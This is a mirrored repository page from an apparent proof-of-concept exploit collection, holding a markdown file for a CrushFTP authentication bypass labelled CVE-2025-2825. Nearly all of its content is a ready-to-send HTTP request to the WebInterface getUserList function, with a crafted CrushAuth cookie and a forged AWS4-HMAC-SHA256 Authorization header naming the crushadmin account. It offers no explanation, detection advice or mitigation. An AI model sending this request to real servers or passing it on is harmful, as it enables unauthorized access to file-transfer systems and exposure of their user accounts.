admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 14:04:06 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md

14 lines
373 B
Markdown
Raw Blame History

## CrushFTP身份验证绕过(CVE-2025-2825)
## poc
```javascript
GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```
![image](https://github.com/user-attachments/assets/6d6a18ba-3b8b-4c65-97c0-ad24cb59e1b2)
Reference in New Issue View Git Blame Copy Permalink